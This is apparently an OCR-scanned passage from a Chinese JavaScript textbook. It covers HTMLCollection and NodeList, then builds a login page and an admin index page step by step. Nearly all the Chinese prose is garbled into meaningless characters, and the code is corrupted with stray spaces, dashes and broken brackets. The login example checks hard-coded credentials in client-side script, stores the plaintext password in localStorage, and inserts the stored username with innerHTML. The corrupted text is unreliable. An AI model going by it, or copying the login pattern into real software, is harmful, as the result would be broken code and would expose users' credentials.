Bl B e SR A — A< form >I0E I HEM id &2 myForm US40 .

/7% 3 % 3.4.1 BUETESCR A — A < form> JLE, I H'EW id 2 myForm

var eleml, elem2;
//document. forms J&—)> HTMLCollection X} £

eleml = document. forms[0];

elem2 document. forms. item(0) ;

alert(eleml === elem2); //shows: "true"
eleml = document. forms.myForm;

elem2 = document. forms. namedItem("myForm");

alert(eleml === elem2); //shows: "true"

eleml = document. forms["named. item.with. periods"];

3.4.2 NodeList X%

NodeList % & & 1 5 09 4 5. 38 % /2 1 J& P (41 Node. childNodes) 1 75 % (0
document. querySelectorAlD) & [0 /), NodeList A& — 804, M 5= — 2N B0 W X 4
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(Like Array Object), F#R NodeList A& — 404 H 2 7] LI A forEachO k&, b
A LU Array. from ORe H 45 9 504

Ak G YR A R ad i, ¥ S B NodeList, forEach O Fl Array. from (), A DA
Array. prototype. forEach () 3 #fl i X — [A] #% ,

TEHELEAH B R NodeList J&— /> S2 I 42 45, 0 500 Ul o A0 2R SR rp (9 5 5B & A= 72 1
] NodeList th2xffiz 284k . 411, Node. childNodes J& 3 i A fREZ AT .

//%; 3 F& 3. 4.2 Node. childNodes J& S Ht )

var parent = document.getElementById( 'parent');
var child nodes = parent.childNodes;

console. log(child nodes. length); [/ R LGE R 22"
parent. appendChild(document. createElement( 'div'));
console. log(child nodes. length); //E I B e 3T

TEHABAF BT . NodeList J&— > #f 85 G o X R A BEJF 0 SCRS 0 A AU 19 A ] 2 3
AR E S HIING . U0 document. querySelectorAll 2% W — 4~ # & A9 NodeList,

15 A0 KRR ] L T L7 B NodeList o0 5036 57 19 77 26

1. NodeList FIE 17 %

NodeList 41 L &M ik .

1) NodelList. length

NodeList H 40 & 1Y 35 s 4L

2) NodelList. itemO)

& [l NodeList XF 48 & & 51 0997 s, a0 R &R 51 8A, WHR A null, 456095 L 2
nodeList[i], ANid , EXFF AT , B U5 B4R [B] undefined.,

3) Nodelist. entriesO)

i [l — A EAC RS VA 3 T AR A b S Y T A R . FERX AR AL T B N O
TG B ECT H 2T A

4) NodelList. forEach()

£ NodeList JC3R AT — R 2 HE Y B K20 R AR 2 8015 388 45 pR R

5) NodelList. keys()

IR A — AN A SRV 3 D RS AL S RS E X R T A B AEX A LT L SR
PNKUPIR GHIUE | o

6) NodelList. valuesO)

iR [l — A EAC RS, VA 3 I 4R A v A A B (BN 1 BT A (T 8D

2. 7£ JavaScript 1 {£ FH NodelList

Al LU for A3 5 —4> NodeList X4 v il B 45 25 AR5 a0 F .

for (var i = 0; i < myNodeList.length; ++1) {

var item = myNodeList[i]; //PH myNodeList. item(1i) &% A W E K
}
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F22 i ] fore-in B for each--in 8 JT — NodeList X £ A Ic &, 10 F 48
ERPABYEHEE K element X4, M| NodeList X} % 11 length 1 item J& 1 2 ¥ 3k Ty
ok X T RE S PR ARZ AT H A . BEAR  fore-in ASBEARTIE U 7] 3 28 & 24 A 5T

or---of JHI K 23 IEBf Huiki 7 NodeList X4, AR 41 F .

//%; 3 % 3.4.2 for - of fEFFH L3 IEH ik J) NodeList Xf 5
var list = document. querySelectorAll( 'input[type = checkbox]');
for (var checkbox of list) {

checkbox. checked = true;

}

AT D O A, S 4 — 2R 7 7 vk, I A0 forEach O L entries O) | values ) #ll keys (),
7ﬁ AP A4 Array 19 Array. prototype. forEach 33 JFj NodeList [ 7 5, X Fh 7 B 3f
% Internet Explorer(E2 3 H) AU T .

//%5 3 & 3.4.2 ¥4 Array f{) Array. prototype. forEach 3k i NodeList [ J7 %
var list = document.querySelectorAll('input[type = checkbox]');
Array. prototype. forEach. call(list, function (checkbox) {

checkbox. checked = true;

1)

3. A1t 4 NodeList "2 # A

NodeList %t G 75 55 46 75 10 A A AR % AL, F b L 7T DL E 0 Array. prototype
Ak AR A SR, BR T forEachO J7 1 . NodeList 3 1 S8 2 DU B 19 5 ik

JavaScript B2k AL G 23T REA K, 4 u R Z B — 854 7 8 (B 4 forEach O
H mapO) S22 B B IR B EE A X 28 5 2 AR AR .

myArray —— > Array. prototype —— > Object. prototype ——> null (772 i Bl— > %F 5 00 JR B 4%, ) mf
DA 3% %2 b % JH] Object. getPrototypeOf, i #| J5 AU 4% ] 3k )

forEachO)5 map O X 2657 X H 52/ Array. prototype X XT R ik, FEH AN —FE
)2 » NodeList [ J BYEE (I ACAS AN T .

myNodeList ——> NodeList. prototype ——> Object.prototype ——> null

NodeList BRI FEE T EMIBAHB forEach Tk 2Z 40 10 F item ) . entries() . keys ()
1 valuesO) F ¥,

— AR PN ERJE T Array. prototype I 7T INE] NodeList. prototype b, 75 2 &
R, 97 DOM X4 4 st B2 R 3 fa S 1Y, JUHGETE IHRRAS /Y Internet Explorer(6.,7.8) 1, 4t
Array. prototype |- )7 R N3] NodeList. prototype |- ) SEBRZ 4] AR ANF .

//%; 3 % 3.4.2 4l Array. prototype b #J7EE S MINE] NodeList. prototype [ 14 5% i 5 {4l
var arrayMethods = Object.getOwnPropertyNames( Array. prototype );
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arrayMethods. forEach( attachArrayMethodsToNodeList );

function attachArrayMethodsToNodeList (methodName)

{
if (methodName !== "length") {
NodeList. prototype[ methodName] = Array.prototype[methodName];

}
¥

var divs = document.getElementsByTagName( 'div');
var firstDiv = divs[ 0 ];

firstDiv. childNodes. forEach(function( divChild ){
divChild. parentNode. style.color = '# 0F0';
)

J3AN AT DOM X G J5 R0 A figg phe i AURS AR

/755 3 F 3.4.2 Y DOM X G JE AL 1 i e g ik

var forEach = Array. prototype. forEach;

var divs = document.getElementsByTagName( 'div');
var firstDiv = divs[ 0 ];

forEach. call(firstDiv. childNodes, function( divChild ){
divChild. parentNode. style. color = '# 0F0';
1);

HTMILCollection 1 NodeList Xf #8544 28l , 7E JavaScript Zi 215 F 1. X I E P8
SERPERRANE Dy B 2H B BT R R ST

(1) B A length B,

(2) #5175 A7t bl

(3) ANHAT SO Gh R A R B 2 Bk

LA P B A1 45 HTMLCollection, NodeList X BRECH A arguments X4,

3.5 DOM BRIELZEE XK

s S A NI 45 4 HTML B CSS ¥ 25 #EA7 0 R0 003 10 B 0 TF . K 5 149 %5
T % A4 B0 PC B0 R 5 BT 5 4 32 P 5015 72 MO AL

3.5.1 JFk—AVEZFxum

—/> PCJ5 54 FAR S8 — E 3% 1Y DL 2 %% 3% DUTAT . % s) DU P AL A K S
fH (0 2 SRR 43, LA K AR 22 FIE I RE
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1. MEBERTHEN
AR foe 0 ) 5 3K R0 25 B8 SR BT B HERRCA R L I 3-17 B .

R

MERE

KB |

( EBHAK J

Pl 3-17 % 53 DI A9 4k W2 A )R
MR 512 25 ¥4 78 S 48 2% TH B 44 login. html 89 3CHF AR UNF .

<t-— {3 % 3.5.1 EHIEET T A H# A N login. html (Y 3C1F ——>
<!DOCTYPE html >
< html lang = "en">
< head >
< meta charset = "UTF — 8">
< meta http — equiv = "X - UA — Compatible" content = "IE = edge">
< meta name = "viewport" content = "width = device — width, initial — scale=1.0">
< title> Document </title>
</head >
< body >
< form class = "login — form">
< div class = "form— item">
< div class = "form — label">lf 5 :</div >
< input class = "form — input" type = "text" placeholder = "if fii A M5 ">
</div >
< div class = "form — item">
< div class = "form — label">%fith :</div >
< input class = "form — input" type = "password" placeholder = " i fii A % ">
</div>
<div class = "form — item form — btn">
< button class = "btn btn — submit" type = "submit">% 5</button >
< button class = "btn btn — reset" type = "reset">H H# </button >
</div >
</form >
</body >
</html >

Fo) 8 S5 1) UL T G A T 5 SR A 3-18 TR .
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LN N J @ Document x +

&€ -5 C 0O ©127.001550053.  w« O 2
i) BEE-T M hao123 §h ALEK [0 SRR

N
| B®

F3-18  H 5 Y TT T s A7 45 2R

2. B CSSULtTTHERRKRENE
FER kXt U CSS R, 52 B B ) B T A9 A Jm FAR 3 19 26 AL AR I T

<!-— #F 3% 3.5.1 LB BRI R A TR ——>
<!DOCTYPE html >
< html lang= "en">
< head >
< meta charset = "UTF — 8">
< meta http — equiv = "X - UA — Compatible" content = "IE = edge">
< meta name = "viewport" content = "width = device — width, initial — scale=1.0">
< title> Document </title>
< style>
html, body{
overflow: hidden;
width: 100 % ;
height: 100 % ;
margin: 0;
background — image: url('static/bgl — 1. jpeg');
background — size: cover;
display: flex;
justify — content: center;
flex — direction: column;
align— items: center;
}
. login - form{
width: 300px;
background - color: rgba(130,120,100,0.3);
padding: 10px 15px;
border: 2px solid rgba(130,120,100,0.7);
border — radius: 7px;
backdrop — filter: blur(8px);
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box — shadow: Opx 2px 15px Opx rgba(130,120,100,0.2);
color: # fff;
}
Ctitle{
padding: 10px 15px;
margin — bottom: 10px;
font — size: 30px;
font — weight: bold;
background: linear — gradient(to right, red, blue, lightgreen);
— webkit — background — clip: text;
— webkit — text — £ill — color: transparent;
}
.login - form . form — item{
display: flex;
align— items: center;
padding: 10px 15px;
}
.login — form . form — item . form — input{
flex — grow: 1,
padding: 10px 15px;
border — radius: 5px;
outline: none;
border:1px solid rgba(200,200,200,0.3);
background - color: rgba(200,200,200,0.1);
color: # fff ;

}
input:: — webkit — input — placeholder {
color: # fff;
}
. btn{
padding: 5px 15px;
border — radius: 5px;
border:1px solid;
margin: Opx 5px;
}
. btn — submit{
color: # fff;
background — color: rgb(10,100,230);
border — color: rgb(10,130,250);
}
.btn - reset({
color: # fff;
background — color: rgb(230,100,30);
border — color: rgb(250,130,30);
}
. form — btn{
justify — content: center;
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</style>
</head >
< body >
<div class = "title">
XX GO {5 B RA N
</div>
< form class = "login — form">
<div class = "form — item">
< div class = "form — label">K 5 :</div >
< input class = "form — input" type = "text" placeholder = "if fiy A K5 ">
</div >
<div class = "form — item">
< div class = "form — label">%%fith :</div >
< input class = "form — input" type = "password" placeholder = "{f i A %5 ">
</div >
< div class = "form — item form— btn">
< button class = "btn btn — submit" type = "submit">% 5E</button >
< button class = "btn btn — reset" type = "reset">H ¥ </button >
</div>
</form >
</body >
</html >

B AT S A AT T LA 2 SRS 8 % SO AR 3-19 IR .

200 @ Document

C @ ® 127.0.0.1:5500/H#3

K3-19 R4k B9 % % vUH

ZW P T RGBA E 435 & 5 X, 928 HTML 2078 (2 3% WSO . 2 0] 0 b it
FIH T background-clip B 73X, SLE SCAR B #i A B 6, BT 2 BN IF A4 CSS FER W
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BRSNS CSS R AT 2 B CSS B A7 S0 Y o 2 b MG 5 88
3.5.2 BRI N #E AR IS K 15 5 Y Y @ i V)

SR T HEAS U A R 4 A AR BB S T B — 2D SE U B SRR BE AR SR DI RE L i

DL F Sk i#E A JavaScript 19 265 B B .
1. BEXTTHEMNRERE

AR TSR S 53 69 D RE S B, I LA AN 7 B 58 I I i 1 52 AT N . AR B

UG D RE B T &R0 . S B P os SRR L anE 3-20 s,
[ g gnsicntt |

Fedilie o uiE Y

Sy

L e

yes

[ westean |

[ wewAm e

Bk iy
EAIE M

i [t s A

L

| kR REH

Pl 3-20 TP SRR
POk AR IRBOE I TR AR B A o AR AL A

<!-- %5 3 & 3.5.2 M EGF W, MARBIEALIGERE ——>
<!DOCTYPE html >
< html lang = "en">
< head >
< meta charset = "UTF - 8">
< meta http — equiv = "X - UA — Compatible" content = "IE = edge">

< meta name = "viewport" content = "width = device — width, initial — scale=1.0">

< title > Document </title>
< style>
html, body{
overflow: hidden;
width: 100 % ;
height: 100 % ;
margin: 0;
background — image: url('static/bgl — 1. jpeg');
background — size: cover;

fra g



}
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display: flex;

justify — content: center;
flex — direction: column;
align— items: center;

. login — form{

}

width: 300px;

background — color: rgba(130,120,100,0.3);

padding: 10px 15px;

border: 2px solid rgba(130,120,100,0.7);

border — radius: 7px;

backdrop — filter: blur(8px);

box — shadow: Opx 2px 15px Opx rgba(130,120,100,0.2);
color: # fff;

Ctitlef

}

padding: 10px 15px;

margin — bottom: 10px;

font — size: 30px;

font — weight: bold;

background: linear — gradient(to right, red, blue, lightgreen);
— webkit — background — clip: text;

— webkit — text — fill — color: transparent;

.login - form . form — item{

}

display: flex;
align— items: center;

padding: 10px 15px;

.login— form . form — item . form — input{

}

flex — grow: 1;

padding: 10px 15px;

border — radius: 5px;

outline: none;

border:1px solid rgba(200,200,200,0.3);
background — color: rgba(200,200,200,0.1);
color: #fff ;

input:: — webkit — input — placeholder {

}

color: # fff;

. btn{

}

padding: 5px 15px;
border — radius: 5px;
border:1px solid;
margin: Opx 5px;

.btn — submit{
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color: # fff;
background — color: rgb(10,100,230);
border — color: rgb(10,130,250);
}
. btn — reset{
color: # fff;
background — color: rgb(230,100,30);
border — color: rgb(250,130,30);
1
. form — btn{
justify — content: center;
}
</style>
</head >
< body >
<div class = "title">
XX G 58 FA N
</div>
< form class = "login — form">
<div class = "form — item">
< div class = "form — label">K 5 :</div >
< input class = "form — input" type = "text" name = "username" placeholder = "if i A Ik 5 ">
</div >
<div class = "form — item">
< div class = "form — label">%fith :</div >
< input class = "form — input" type = "password" name = "password" placeholder = "{E i A AL ">
</div >
<div class = "form — item form — btn">
< button class = "btn btn — submit" type = "submit">% 5E</button >
< button class = "btn btn — reset" type = "reset">H ¥ </button >
</div>

</form >

< script >
var form = document. querySelector('.login— form')
form. addEventListener( 'submit', function(e) {

/ /i1t FormData Xt 42 44 3 5%t 4 7 41l 1k
var formData = new FormData(form)
//%3%| nane 3y username [ % AHEH A 1 4 2%
var username = formData.get('username').trim()
/ /4% || name 4 password i i A HEfT A ) N 25
var password = formData.get('password').trim()
/178 AT T-HLS- A% 1 1E ) 2 38 =X
var reg = /*1[3-9]\d{9}s/
//HM] username J& A5 2 45
if (username. length == 0){
/ /58 s AE
alert ("I ATKS ")
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//FH 1R R BB S AT
e. preventDefault()
return
}
//¥: M username J& & A FHL 5 5 % X
if(!reg. test(username) ) {
[/ 3 R HE
alert (i 4y A IEAG A MK S, U0 188xxxxxxxx')
//FH 1R R BN S AT H
e. preventDefault()
return
}
/K5I R R A Sy A
if (password. length == 0){
/758 R HE
alert('iEH A ")
//BA 1k R B BN AR AT R
e. preventDefault()
return
}
/17 AR Y K 5 R R A 3
if (username != '18945051918' | | password != '123456"){
/ /3 3 R HE
alert('Mk5 B2 45 1R ")
//FH 1R R BRI ST R
e. preventDefault()
return

}
[/ &R A B i, K TP R B R AE A S 2 A7
alert( ')
/145 T 2% i A7 A% 7E JSON Xif 4
var userInfo = ({
username:username,

password: password

}
/7% R P A5 BARAFF localStorage H, i HLTE 2 ] JSON. stringify() LB 1k FR A7 i K04
//78 i [ object Object]
localStorage. setItem( 'userInfo', JSON. stringify(userInfo))
}, false)
</script >
</body >
</html >

DI RETF A& 58 T - 5 W5 RN 5 Ry 25 K5 2 T AL -5 A =X 8 e 5 R 85 AL AN 2 13 A 1Y)
NS DU 8 2 2 i L0 A B 27 B 3-21 o .

5 i FE 0 1 T 5 R 28 B PR A 76 Sl D R D)) 0 s L S 8 SR R T A A R L (R
AN PAT DU Bk L3k 2 R O R LAY action J& M M AR B E AT AT B L B AR . AN R A 3R AL
BAAT submit #2232 FH M, Y< form >HNERELE type N submit BY< button >HREZE M, BAd7i%
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" 127.0.0.1:5500 &%
MWAKE

3-21 B BE AR 5 N A 4R R

F 25 fih & < form >XF 21 submit 4, iz F AR AT B R G , W E 25 2 B Bk 2< form >0
action J& PEORAE MY B2 T . #5 action WA AT AR AT BE &, U X LA HRAT RBN AT 8 . #E submit
A i A B AR TP R T 3 AR AU AL 56, A5 AL 6 2 38 2, DU AT LA 3 preventDefault O 2 B 11
BN ERAZAT N . J34h B R R, 4%t localStorage B object 28R 1Y B Hs I . 75 20Kt
AL A Jl ol SCAR A, 45 ) 2 B =8 6 42 19 toString O BRI, PR A7 19 45 21 25 72 i [object
Object]
. BEEERNER Y%
mﬁ%%ﬁﬁﬂ@?@ﬁ%ﬁ%ﬁ%)ﬁ o A BTN I T 014 58 ARG BT I T A A SR R AT B
AV 3 B AT LR E B2 R A R AT T S B R i D)4
F2 TR FE login. html [ 2% H 5% F 1 & static H 5. 7E static H A A2 4 5K K R,
&l 3-22 FIiR
v static
- bgl-1jpeg
= bgi-2ipeg

« bgl-3.jpeg
. bgl-4.jpeg

K 3-22 A static HsE P FERL 4 Tk KA

W R 2T LB 25 8 XA 0T DLy 8 8 AT 5 RS 4 5 . 38 1 R A2 401 1Y
JavaScript #8438 i & AT 55 Jﬁ}]?ﬁK body >0 5t 1 - b ARAS AN .

<\—— % 3% 3.5.2 fEE WM JavaScript F B MERAES ——>
<!DOCTYPE html >

< html lang= "en">

< head >
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< meta charset = "UTF - 8">
< meta http — equiv = "X - UA — Compatible" content = "IE = edge">
< meta name = "viewport" content = "width = device — width, initial — scale=1.0">
< title> Document </title>
< style >
html, body{
overflow: hidden;
width: 100 % ;
height: 100 % ;
margin: 0;
background — image: url('static/bgl — 1. jpeg');
background — size: cover;
display: flex;
justify — content: center;
flex — direction: column;
align— items: center;
}
. login — form{
width: 300px;
background — color: rgba(130,120,100,0.3);
padding: 10px 15px;
border:2px solid rgba(130,120,100,0.7);
border — radius: 7px;
backdrop — filter: blur(8px);
box — shadow: Opx 2px 15px Opx rgba(130,120,100,0.2);
color: # fff;
}
.titlef
padding: 10px 15px;
margin — bottom: 10px;
font — size: 30px;
font — weight: bold;
background: linear — gradient(to right, red, blue, lightgreen);
— webkit — background — clip: text;
— webkit — text — £ill — color: transparent;
}
.login - form . form — item{
display: flex;
align— items: center;
padding: 10px 15px;
}
.login— form . form — item . form — input{
flex — grow: 1,
padding: 10px 15px;
border — radius: 5px;
outline: none;
border:1px solid rgba(200,200,200,0.3);
background — color: rgba(200,200,200,0.1);
color: #fff ;

| 255
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}
input:: — webkit — input — placeholder {
color: # fff;
}
. btn{
padding: 5px 15px;
border — radius: 5px;
border:1px solid;
margin: Opx 5px;
}
. btn — submit{
color: # fff;
background — color: rgb(10,100,230);
border — color: rgb(10,130,250);
}
. btn — reset{
color: # fff;
background — color: rgb(230,100,30);
border — color: rgb(250,130,30);
}
. form — btn{
justify — content: center;
}
</style>
</head >
< body >
<div class = "title">
XX FHF-HHREAH
</div>
< form class = "login — form">
<div class = "form — item">
< div class = "form — label">k 5 :</div >
< input class = "form — input" type = "text" name = "username" placeholder = "I i A K5 ">
</div>
<div class = "form — item">
< div class = "form — label">%fith :</div >
< input class = "form — input" type = "password" name = "password" placeholder = "i# %y A AL ">
</div>
<div class = "form — item form — btn">
< button class = "btn btn — submit" type = "submit">% 5 </button >
< button class = "btn btn — reset" type = "reset">H # </button >
</div>

</form >
< script>
[ & Seemseeese s B RS —— = x/
/R B 45 R AR ) index Ja 44 14 4 FH i BBl DA B AR )55 4 s S AR 5 s
(function() {
var index = 1
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setInterval (function(){

/758 BE 1T S R
document. body. style. backgroundImage = 'url("static/bgl — '+ index+ '.jpeg")"
index++
if(index == 5){
index = 1
}
},1000)
1O
e N y

var form = document. querySelector('.login— form')
form. addEventListener( 'submit', function(e) {
//i@ 14 FormData X} 42 4% 3 5%} 42 ¢ 5l 1k
var formData = new FormData(form)
//%5 % name & username [ i A HEHi A B N 25
var username = formData.get('username').trim()
//1% 3] name Jy password H i A HEHii A [ P 45
var password = formData.get('password').trim()
/1 7€ AL 5 T HL5- A 1) 1F ) 3% 3k =X
var reg = /*1[3-9]\d{9} $/
/ /¥ username J& & %5
if (username. length == 0){
/755 R HE
alert( "Ik AMKS ")
//BA 1k R BB IA B AR AT R
e. preventDefault()
return
}
/ /KM username J& 75 4 FHL 5 A5 4K =
if (! reg. test(username) ) {
/758 R AE
alert( "I A IE#A MK S, 41 188xxxxxxxx")
/P 1R R BRI ST R
e. preventDefault()
return
}
1/ 2 A5 R 1 Ry s
if (password. length == 0){
/ /5 $E R HE
alert('IEH A% ")
//FH 1R R BRI 32 AT h
e. preventDefault()
return
}
/17 b A5 HUL K 5 T 4 A AR B
if (username != '18945051918' | | password != '123456"){
/73 B s HE
alert('K5 5 2 45 R )
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//FH 1R R BB S AT
e. preventDefault()
return
}
[/ &R S AR o, 5 PR B R AE A S A
alert (' & EALT ")
/¥ 5 T B S A7 i 7E JSON X 42 v
var userInfo = ({
username:username,
password: password
}
/7% P A5 BARAF 5 LlocalStorage 1, 3% HL 75 B2 ffi i JSON. stringify() LA i 1k fRAF 14 £ 4
//7% [ object Object]
localStorage. setItem( 'userInfo', JSON. stringify(userInfo))

}, false)
</script >

</body >
</html >

3.5.3 WHUSHL ARG G St

SR UUA login. html #5858 58 J5 , 9k 221 & FLX R 9 55
1. BT EHB
W H L PC v i 5 648 PR S0 v A e AT JLAPE WAE R L Al 3-23 Bk .

I | ) 1)

( J

K 3-23 G BEMAGEMN AR

AATLLE 3-23 R ES 1 B AR R o0 B, 1 AT UL T A 3 AR g 6 A L 7E g e b A
index. html 3¢ ARSI .

<t—— % 3% 3.5.3 7Ei £ Al index. htnl CfF ——>
<!DOCTYPE html >

< html lang = "en">

< head >

< meta charset = "UTF — 8">

< meta http — equiv = "X - UA — Compatible" content = "IE = edge">

< meta name = "viewport" content = "width = device — width, initial — scale=1.0">
< title> Document </title>

</head >
< body >



< div class = "container">
<div class = "top">
< div class = "title"> XX B M £</div >
< div class = "user — info">
< div class = "username"></div >

$3%
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< button class = "btn btn — submit">iB H} % 5% </button >

</div >
</div>
< div class = "container horizontal">
< div class = "left">
Fe HLIX I
</div >
< div class = "right">
1) 3% / R X 35k
</div >
</div >
</div>
</body >
</html >

ZER A R BB 1T &5 R an il 3-24 TR

& Document x +
C O © 127.00. h « O &
i A BE—T 2 hao123 @ RMISA D RFmE
FIFR/IhEERE
A |

el 320 S54RI 15 7 B0 45

2. ERTEFER

BT ORI LB N CSS AU, S b A A A R B DT A7 R AR L AU I T

<!—— %5 3 & 3.5.3 fE4g 25 A7 index. htnl L —— >

<!DOCTYPE html >
< html lang = "en">
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< head >
< meta charset = "UTF - 8">
< meta http — equiv = "X - UA — Compatible" content = "IE = edge">
< meta name = "viewport" content = "width = device — width, initial — scale=1.0">
< title > Document </title>
< style>
html, body{
overflow: hidden;
width: 100 % ;
height: 100 % ;
margin: 0;
}
Ctitle{
padding: 10px 15px;
font — size: 30px;
font — weight: bold;
background: linear — gradient(to right, red, blue, lightgreen);
— webkit — background — clip: text;
— webkit — text — £ill — color: transparent;
1
. container({
display: flex;
flex — direction: column;
flex — grow: 1;
height: 100 % ;
}
. container. horizontal {
flex — direction: row;
1
.user — info{
display: flex;
align— items: center;
}
. top{
display: flex;
padding: Opx 15px;
align— items: center;
height: 60px;
background — color: rgb(120,120,120);
justify — content: space — between;
}
. left{
width: 200px;
background — color: rgb(100,100,100);
height: 100 % ;
box — sizing: border — box;
padding: 15px;
}
. right{
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background — color: rgb(140,140,140);
flex — grow: 1;
padding: 15px;
}
. btn{
padding: 5px 15px;
border — radius: 5px;
border:1px solid;
margin: Opx 5px;
}
.btn — submit{
color: # ££f;
background — color: rgb(10,100,230);
border — color: rgb(10,130,250);
}
. btn — reset{
color: # fff;
background — color: rgb(230,100,30);
border — color: rgb(250,130,30);
}
. form — btn{
justify — content: center;
}
</style>
</head >
< body >
< div class = "container">
<div class = "top">
< div class = "title"> XX & I H</div >
< div class = "user — info">
< div class = "username"></div >
< button class = "btn btn — submit">iE H} % 5% </button >
</div>
</div>
< div class = "container horizontal">
<div class = "left">
S R IX dif
</div >
<div class = "right">
G 3R /Yy 18 Xk
</div >
</div>
</div>
</body >
</html >

i RRE R E BT 45 R 3-25 AR .
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o000 @ Document X +

€ 5 C 0 O 127.0.0:5500findex.htmi?u.. & ¥ [0 2
i A B Em-T M heo12s §h AuSm B raaw [ BEieee

XS LEIAF: 18grmonx

RepXi FUR/ThEER T

Kl 3-25 AR AE R GHE AT R 45

3. ERMERREMAREERT
N kM F login. html] I ZEHCHS b, ZE< form >R BAEE /B M action J& 1 (B {5 1] 28
i index. html 5 login, html ZE[H— H Z F) ACB T .

< form class = "login — form" action = "index. html"> .. </form >

R AR S o 5 O A T ) DU 5 0 0 O B O SR AL I 5 B SR AR SR L T
12 H 3Bk 201 247 1Y index. html] BUH 1,

BRI B DU ARl AR M R A B A B . 3R 2K L TE index. html SO
IUA PG AR BGE B, S P K S TE R A A B s ARSI F .

<!I-— % 3% 3.5.3 LA KSR EAKRR ——>
<!DOCTYPE html >
< html lang = "en">
< head >
< meta charset = "UTF - 8">
< meta http — equiv = "X - UA — Compatible" content = "IE = edge">
< meta name = "viewport" content = "width = device — width, initial — scale=1.0">
< title > Document </title >
< style >
html, body{
overflow: hidden;
width: 100 % ;
height: 100 % ;



}
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margin: 0;

Ctitle{

}

padding: 10px 15px;

font — size: 30px;

font — weight: bold;

background: linear — gradient(to right, red, blue, lightgreen);
— webkit — background — clip: text;

— webkit — text — £ill — color: transparent;

. container({

}

display: flex;
flex — direction: column;
flex — grow: 1;
height: 100 % ;

. container. horizontal {

}

flex — direction: row;

.user — info{

}

display: flex;
align— items: center;

. top{

}

display: flex;

padding: Opx 15px;

align— items: center;

height: 60px;

background — color: rgb(120,120,120);
justify — content: space — between;

Cleft{

}

width: 200px;

background — color: rgb(100,100,100);
height: 100 % ;

box — sizing: border — box;

padding: 15px;

. right{

}

background — color: rgb(140,140,140);
flex — grow: 1;
padding: 15px;

. btn{

padding: 5px 15px;
border — radius: 5px;
border:1px solid;
margin: Opx 5px;



264 | JavaScriptf& k= &

. btn — submit{
color: # fff;
background — color: rgb(10,100,230);
border — color: rgb(10,130,250);
}
. btn — reset{
color: # fff;
background — color: rgb(230,100,30);
border — color: rgb(250,130,30);
}
. form — btn{
justify — content: center;
}
</style>
</head >
< body >
< div class = "container">
< div class = "top">
< div class = "title"> XX B I H</div>
< div class = "user — info">
<div class = "username"></div >
< button class = "btn btn — submit">jiB H} % 5% </button >
</div >
</div >
< div class = "container horizontal">
<div class = "left">
S PR IX I
</div>
< div class = "right">
51| 3% / 1 R X 5k
</div >
</div>
</div>
< script >
var userInfo
/755 AL B, B 1k oA B Sk U [ 32 0T THT B R AR S
try {
userInfo = JSON. parse(localStorage.getItem('userInfo'))
} catch (error) {
userInfo = {}
}
/1R RO P A5 B A 4 X 42

var un = document. querySelector('. username')

un. innerHTML = "47{jfH F' ;' + userInfo. username
</script >
</body >
</html >

FHBEITHZE R NE 3-26 Fis .,
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LN N J @ Document X +

€ 5> C (0 © 127.0.0.1:5500/index.htmizu.. h ¥ [0 &
i mA B ST aF hao123 §h ANSK U0 FreE B EEw6es  »

<XEE ot HEJAF: 189%wkwckkx |

R IR/ THEER I

Kl 3-26  RBIEATHIEE R

3.5.4 Uy AU P DRSS SR 19

TFRH) 3.5, 3 58I T RE 5, 8 0l 55 B L E & 58 3% . (A bR b if Bk R AR 2 2 Y
WA,
(1) 4HTH) A 5 B R localStorage X G474k, IF A B4 A shid M Th 6 .

(2) I E GO RS BLE 8 R I RE .

(3) A7 LIRS AR A HEA B 5 R P 2l 5 [0 S T O $ s i 8 o

(4) 27 LE B SRS [R]85 wu i )17 A 3l Bk e 21 i ot

1. IRBHBRIER

TEE LTF AU index. htm] SCOFHIE IR 8% 0l 55, 7 200 18 8 S 4% 414 m id
PRARL I FL A B P A B R R IR R SR R A IR

<!-— % 3% 3.5.4 fER Tl F R SRR >
<!DOCTYPE html >
< html lang = "en">
< head >
< meta charset = "UTF - 8">
< meta http — equiv = "X - UA — Compatible" content = "IE = edge">
< meta name = "viewport" content = "width = device — width, initial — scale=1.0">
< title> Document </title>
< style>
html, body{
overflow: hidden;
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width: 100 % ;
height: 100 % ;
margin: O;
}
Ctitle{
padding: 10px 15px;
font — size: 30px;
font — weight: bold;
background: linear — gradient(to right, red, blue, lightgreen);
— webkit — background — clip: text;
— webkit — text — £ill — color: transparent;
}
. container({
display: flex;
flex — direction: column;
flex — grow: 1;
height: 100 % ;
}
. container. horizontal{
flex — direction: row;
}
. user — infof
display: flex;
align — items: center;
}
. top{
display: flex;
padding: Opx 15px;
align— items: center;
height: 60px;
background — color: rgb(120,120,120);
justify — content: space — between;
}
L left{
width: 200px;
background — color: rgb(100,100,100);
height: 100 % ;
box — sizing: border — box;
padding: 15px;
}
. right({
background — color: rgb(140,140,140);
flex — grow: 1,
padding: 15px;
}
. btn{
padding: 5px 15px;
border — radius: 5px;
border:1px solid;



margin: Opx 5px;

}

. btn — submit{
color: # fff;
background - color: rgb(10,100,230);
border — color: rgb(10,130,250);

}

.btn — reset{
color: # fff;
background — color: rgb(230,100,30);
border — color: rgb(250,130,30);

1

. form — btn{
justify — content: center;

}

</style>
</head >
< body >
< div class = "container">

< div class = "top">
< div class = "title"> XX B HI S E</div >
< div class = "user — info">

< div class = "username"></div >
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<!—— 3Bl id= "logout" ——>
< button id = "logout" class = "btn btn — submit">iE H} % 5 </button >
</div >
</div >

< div class = "container horizontal">
< div class = "left">
S HLIX B
</div >
< div class = "right">
1) 3% / D1 R X 35k
</div >
</div >
</div>
< script >
var userInfo
/755 AL B, B 1k oA B SR U [ 9% 0T TG R A SR
try {

userInfo = JSON. parse(localStorage. getItem( 'userInfo'))||{}

} catch (error) {
userInfo = {}

}

var un = document. querySelector('. username')

un. innerHTML = "4 @i :' + userInfo. username
/738 TR R SRR

logout. addEventListener( 'click', function() {
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//F|H window. confirm() pR &L, 3 H X i HE
var doIt = window.confirm('[E7EE H & 5%, & B 4ks?")
/1% doIt 2Hy true, MIACERH] 7 PUAT T #f A AE
if(doIt == true){
/1385 WA A7 Al B
localStorage. clear()
/ /%% 1] 5 ik T T
location. href = 'login. html'
}
1)
</script >
</body >
</htnl >

VTS S, 2 A R B S R A RS 0 Y A T 1 4 o S E L 9 1) R S Ak 2B
Bt A 3-27 Fiw,

o000 @ Document ®x 4+

€« 2> C ¢ © 127.0.0.1:5500find... o (h

127.0.0.1:5500 B
EEEHESR, EEHE?

P 3-27 W BE AR BT 17T 23 5 XS A AE
T i AR LS 0 YRR 2 H BBk 1D login. html BUTE , I H localStorage #1477 11
HESBERE=.
2. BB Bhid BRI 8 AR
